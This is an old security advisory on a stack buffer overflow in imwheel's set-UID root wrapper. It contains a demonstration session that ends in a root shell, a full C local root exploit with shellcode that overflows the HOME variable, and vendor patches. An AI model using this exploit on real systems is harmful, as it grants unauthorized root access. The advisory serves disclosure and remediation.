COMMAND

    imwheel

SYSTEMS AFFECTED

    Any system which has imwheel-solo wrapper-script installed as set-UID root

PROBLEM

    Following is  based on  TESO Security  Advisory.   A vulnerability
    within  the  imwheel  application  for  Linux has been discovered.
    Some   of   these   packages   are   shipped   with  an  suid-root
    wrapper-script that  invokes the  insecure program  'imwheel' with
    UID 0.

    Among the vulnerable distributions  (if the package is  installed)
    is  Halloween   Linux  Version   4  (imwheel   package  from   the
    powertools/contrib. CD).

    Tests:

        [stealth@liane stealth]$ id
        uid=500(stealth) gid=500(stealth) groups=500(stealth)
        [stealth@liane stealth]$ cd imhack/
        [stealth@liane imhack]$ stat `which imwheel-solo`
          File: "/usr/X11R6/bin/imwheel-solo"
          Size: 795          Filetype: Regular File
          Mode: (4755/-rwsr-xr-x)         Uid: (    0/    root)  Gid: (    0/    root)
        Device:  3,1   Inode: 214472    Links: 1
        Access: Mon Mar 13 17:32:22 2000(00000.00:04:38)
        Modify: Mon Nov  1 23:41:15 1999(00132.17:55:45)
        Change: Sun Mar 12 17:49:43 2000(00000.23:47:17)
        [stealth@liane imhack]$ cc imexp.c
        [stealth@liane imhack]$ ./a.out
        Creating boom-shell...
        Creating shellcode...
        You can also add an offset to the commandline.
        Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer
        Respect other users privacy!
        Invoking vulnerable program (imwheel-solo)...
        imwheel is not running as a daemon.
        imwheel is not checking/writing a pid file, BE CAREFUL!
        An imwheel may be running already, two or more imwheel processes
        on the same X display, or using gpm -W, will not operate as expected!
        imwheel started (pid=1385)
        Knocking on heavens door...
        sh-2.03# id
        uid=0(root) gid=500(stealth) groups=500(stealth)
        sh-2.03#

    An  attacker  may  gain  local  root-access  to  a  system   where
    vulnerable imwheel package  is installed.   Even if it  should not
    be possible for him  to get a root-shell  (f.e. due to a  non-exec
    stack-patch) he can use the suid-root perlscript to kill arbitrary
    processes.

    The  suid-root  perlscript  'imwheel-solo'  invokes  the 'imwheel'
    program  with  EUID  0.   Due  to  inaccurate  bounds-checking  an
    internal stack-located  buffer can  be overflowed  by an attacker.
    The  'imwheel'  program  doesn't  bounds-check  the string it gets
    from the  HOME environment  variable.   Further the wrapper-script
    which runs privileged can be fooled into sending a SIGTERM  signal
    to arbitrary processes, causing them to die.  This problem appears
    because  imwheel-solo   blindly  trusts   any  PID   given  by   a
    world-writable pid-file.

    The bug-discovery  and the  demonstration programs  are due  to S.
    Krahmer.  The shell-code is due to Stealth.  Exploit can be  found
    at:

        http://www.cs.uni-potsdam.de/homepages/students/linuxer/
        http://teso.scene.at or https://teso.scene.at/

    Janusz Niewiadomski posted his vesrsion of exploit...

    /*
     *  imwheel local root exploit [ RHSA-2000:016-02 ]
     *  funkysh 04/2000 funkysh@kris.top.pl
     */

    #include <stdlib.h>
    #include <stdio.h>

    #define BUFFER 2070
    #define NOP 0x90
    #define PATH "/usr/X11R6/bin/imwheel-solo"

    char code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46"
                "\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
                "\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
                "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

    unsigned long getesp(void) { __asm__("movl %esp,%eax"); }

    int main(int argc, char *argv[])
    {
      int i, offset = 0;
      char buf[BUFFER];
      long address;
      if(argc > 1) offset = atoi(argv[1]);
      address = getesp() + 1000 + offset;
      memset(buf,NOP,BUFFER);
      memcpy(buf+(BUFFER-300),code,strlen(code));

      for(i=(BUFFER-250);i<BUFFER;i+=4)
      *(int *)&buf[i]=address;
      setenv("DISPLAY", "DUPA", 1);
      setenv("HOME", buf, 1);
      execl(PATH, PATH, 0);
    }

SOLUTION

    The  Slackware  package  available  from  Linuxmafia.org  is   not
    effected by this,  as it does  not package with  the SUID wrapper.
    (The binary included is also not set SUID.)  This is with  version
    0.9.6 of imwheel.  A  SUID wrapper should simply not  be necessary
    in the first place.

    The standard  package of  imwheel 0.9.7  does not  have a wrapper.
    However, during 'installation,' it will prompt you asking  whether
    or not to install SUID.  An excerpt from the Makefile:

        ## Setting UID, this is best for non-root usage!
        ## This does not effect usage for root users. (duh!)
        ## This gives all users kill privileges for other imwheel processes.

    Judging from  that, if  you setup  imwheel to  be started  via the
    users' xinit scripts,  and killed upon  logout, it would  have the
    same function.  To reiterate, SUID  is just a quick cop-out for  a
    better setup.  If it is a one-user desktop machine, even less than
    that would have to be done.

    For RedHat via 'rpm -Fvh [filename]' apply following:

      Red Hat Powertools 6.1:
        intel: ftp://updates.redhat.com/powertools/6.1/i386/imwheel-0.9.8-1.i386.rpm
        alpha: ftp://updates.redhat.com/powertools/6.1/alpha/imwheel-0.9.8-1.alpha.rpm
        sparc: ftp://updates.redhat.com/powertools/6.1/sparc/imwheel-0.9.8-1.sparc.rpm
        sources: ftp://updates.redhat.com/powertools/6.1/SRPMS/imwheel-0.9.8-1.src.rpm

      Red Hat Powertools 6.2:
        intel: ftp://updates.redhat.com/powertools/6.2/i386/imwheel-0.9.8-1.i386.rpm
        alpha: ftp://updates.redhat.com/powertools/6.2/alpha/imwheel-0.9.8-1.alpha.rpm
        sparc: ftp://updates.redhat.com/powertools/6.2/sparc/imwheel-0.9.8-1.sparc.rpm
        sources: ftp://updates.redhat.com/powertools/6.2/SRPMS/imwheel-0.9.8-1.src.rpm

    Updated RedHat Advisory says  that because the core  functionality
    of imwheel has been incorporated into many existing  applications,
    removing  imwheel   will  not   incur  a   significant  loss    of
    functionality.  If the machine which has imwheel installed is  not
    a single user machine they recommend removing imwheel.  To  remove
    imwheel run this command:

        rpm -e imwheel